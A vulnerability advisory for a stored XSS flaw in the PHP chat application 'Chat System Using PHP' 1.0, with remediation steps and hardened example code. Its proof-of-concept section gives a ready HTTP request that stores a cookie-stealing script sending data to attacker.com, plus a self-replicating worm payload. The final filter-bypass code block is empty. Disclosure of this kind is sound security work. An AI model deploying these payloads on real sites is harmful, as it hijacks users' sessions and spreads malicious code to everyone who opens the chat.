### Vulnerability Overview

**Affected Versions:**

- Product: Chat System Using PHP
- Version: 1.0
- Vendor: code-projects.org
- Type: Web Application
- Language: PHP
- Database: MySQL

**Vulnerability Information:**

- Vulnerability Type: Stored Cross-Site Scripting (Stored XSS)
- CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)
- Severity: High
- CVSS v3.1 Score: 8.7
- Attack Vector: Network
- Attack Complexity: Low
- Required Privileges: Low (requires a valid session to send messages)
- User Interaction: Required (victim must open the chat room)
- Status: Unpatched

**Vulnerability Description:**

A Stored Cross-Site Scripting (XSS) vulnerability was identified in the real-time chat messaging feature of Chat System Using PHP version 1.0. Two files form the complete injection-to-execution chain:

- **Injection**: The `msg` parameter in `send_message.php` is written directly into the `chat` table without sanitization, HTML encoding, or input validation.
- **Execution**: In `fetch_chat.php`, when any user loads the chat room, all stored messages are retrieved and rendered with bare `echo` statements, without `htmlspecialchars()`, `htmlentities()`, or any other output encoding.

Because the payload persists in the database, it executes in the browser of every user who opens the room, including administrators, for as long as the message record exists. A single injection therefore creates a persistent attack surface, and a payload that re-posts itself (see the worm PoC below) makes it self-propagating.

### Impact Scope

- **Session Hijacking**: The session cookie of every user who opens the chat room, including administrators, can be sent to the attacker. This requires that the session cookie is not flagged `HttpOnly`; the default PHP configuration does not set that flag.
- **Persistent Attack Surface**: The payload survives server restarts and remains active until the database record is deleted.
- **Full Administrative Privileges**: Replaying a stolen administrator session gives the attacker full control of the application.
- **Worm-like XSS**: The payload can re-post itself to the room from each victim's session, so once it has spread, deleting the original record is not enough.
- **Phishing**: All users can be silently redirected to attacker-controlled pages.
- **Keylogging**: Browser-based keyloggers can be injected into the page for every affected user.
- **Cascading Impact**: Combined with VULN-001, a stolen administrator session can lead to database compromise without requiring additional credentials.

### Remediation

1. **Escape All Outputs**: Wrap every value sourced from the database with `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` before echoing it in `fetch_chat.php`. This is the authoritative fix; the remaining items are defense in depth.
2. **Validate Stored Inputs**: Validate `$_POST['msg']` in `send_message.php` (UTF-8 well-formedness, length, non-empty) before inserting it. If you also choose to apply `strip_tags()` or `htmlspecialchars()` at input time, note that `strip_tags()` alone is not a reliable XSS control, and that encoding on both input and output produces double-encoded text; storing the raw message and encoding on output is the cleaner pattern.
3. **Content Security Policy (CSP)**: Deploy a strict CSP header: `Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';`. Without `'unsafe-inline'` the browser refuses inline `<script>` blocks and inline event handlers, which blocks both PoC payloads below; any inline scripts the application itself relies on must first be moved to same-origin `.js` files.
4. **HttpOnly Session Cookies**: Set `session.cookie_httponly = 1` and `session.cookie_secure = 1` in `php.ini` so that JavaScript cannot read the session token. This stops cookie exfiltration but not the other actions an injected script can take in the victim's session, such as the same-origin request the worm payload makes.
5. **Fix Concurrent SQL Injection**: Use prepared statements in `send_message.php` to address the SQL injection issue at the same time, preventing compound exploitation.
6. **Enforce Message Length**: Implement a server-side maximum message length (e.g., 500 characters) to restrict payload size.
7. **Context-Aware Output**: Use a template engine with automatic escaping enabled (e.g., Twig, Blade) to prevent future XSS vulnerabilities across all output contexts.
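The following is an added example of what the injection and execution files look like once the remediation steps above are applied together. It is not code from the Chat System Using PHP project. It assumes a `mysqli` connection in `$conn`, a `chat` table with columns `room_id`, `username`, `msg` and `sent_at`, and a `$_SESSION['username']` set at login; the real project's schema and variable names may differ.

```php
<?php
// ---- send_message.php (hardened) ----
// Cookie flags must be set before session_start() to take effect
// (remediation step 4). Equivalent to the php.ini settings.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
session_start();

// Sending a message requires an authenticated session.
if (empty($_SESSION['username'])) {
    http_response_code(401);
    exit('login required');
}

// Step 6: server-side validation of the message. The raw text is
// stored as-is; encoding happens on output (step 2).
$msg    = (string) ($_POST['msg'] ?? '');
$roomId = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
if ($roomId === false || $roomId === null) {
    http_response_code(400);
    exit('invalid room id');
}
if (trim($msg) === '' || !mb_check_encoding($msg, 'UTF-8') || mb_strlen($msg, 'UTF-8') > 500) {
    http_response_code(400);
    exit('invalid message');
}

// Step 5: a prepared statement closes the SQL injection as well.
// Column names are assumed; adjust to the real schema.
$username = (string) $_SESSION['username'];
$stmt = $conn->prepare(
    'INSERT INTO chat (room_id, username, msg, sent_at) VALUES (?, ?, ?, NOW())'
);
$stmt->bind_param('iss', $roomId, $username, $msg);
$stmt->execute();
$stmt->close();

// ---- fetch_chat.php (hardened) ----
// Step 3: strict CSP. Inline <script> and on* handlers are refused by
// the browser, so even an unescaped record could not execute.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
header('Content-Type: text/html; charset=UTF-8');

// Step 1: single escaping helper used for every database value.
// ENT_SUBSTITUTE keeps invalid byte sequences from producing an
// empty string, which would silently drop a message.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$roomId = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($roomId === false || $roomId === null) {
    http_response_code(400);
    exit('invalid room id');
}

$stmt = $conn->prepare(
    'SELECT username, msg, sent_at FROM chat WHERE room_id = ? ORDER BY sent_at ASC'
);
$stmt->bind_param('i', $roomId);
$stmt->execute();
$result = $stmt->get_result();

// Both the sender name and the message body pass through e(). A stored
// "<script>fetch(...)</script>" is rendered as the literal text
// "&lt;script&gt;fetch(...)&lt;/script&gt;" and never executes.
while ($row = $result->fetch_assoc()) {
    echo '<div class="chat-msg">'
        . '<b>' . e($row['username']) . '</b> '
        . '<span class="time">' . e($row['sent_at']) . '</span>: '
        . e($row['msg'])
        . '</div>' . "\n";
}
$stmt->close();
```

The escaping helper is the only change that actually removes the vulnerability; the CSP, cookie flags, length limit and prepared statement each close off one of the consequences listed under Impact Scope. Note that `e()` is correct only for HTML body and double-quoted attribute contexts; if a message ever ends up inside a JavaScript string or a URL, a context-specific encoder (or a template engine with automatic, context-aware escaping, step 7) is required.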
### Proof of Concept (PoC) Code

**POST Request Demo:**

The message body is shown URL-encoded as it must be sent; a raw `+` in an `application/x-www-form-urlencoded` body would decode to a space and break the payload.

```http
POST /admin/send_message.php HTTP/1.1
Host: localhost:8081
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=d486bce7875c6d8bc3aa2b9269691f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Referer: http://localhost:8081/admin/chatroom.php?id=1
Connection: keep-alive

msg=%3Cscript%3Efetch('http://attacker.com/steal?c='%2Bbtoa(document.cookie))%3C/script%3E&id=1
```

Decoded, the stored message is `<script>fetch('http://attacker.com/steal?c='+btoa(document.cookie))</script>`. Every user who then loads `fetch_chat.php` for room 1 sends their own cookies to `attacker.com`.

**Self-Propagating Worm Payload:**

Placed inside a `<script>` element in the message, this re-posts the very element it is running from, so each victim who opens the room adds another copy to the `chat` table.

```javascript
// document.currentScript is the <script> element now executing;
// its outerHTML is the complete payload, tags included.
var xhr = new XMLHttpRequest();
xhr.open('POST', '/admin/send_message.php', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
// The victim's own session cookie is attached automatically (same origin),
// so HttpOnly does not prevent this step.
xhr.send('msg=' + encodeURIComponent(document.currentScript.outerHTML) + '&id=1');
```

**Alternative Payload to Bypass Basic `<script>` Filters:**

```html
```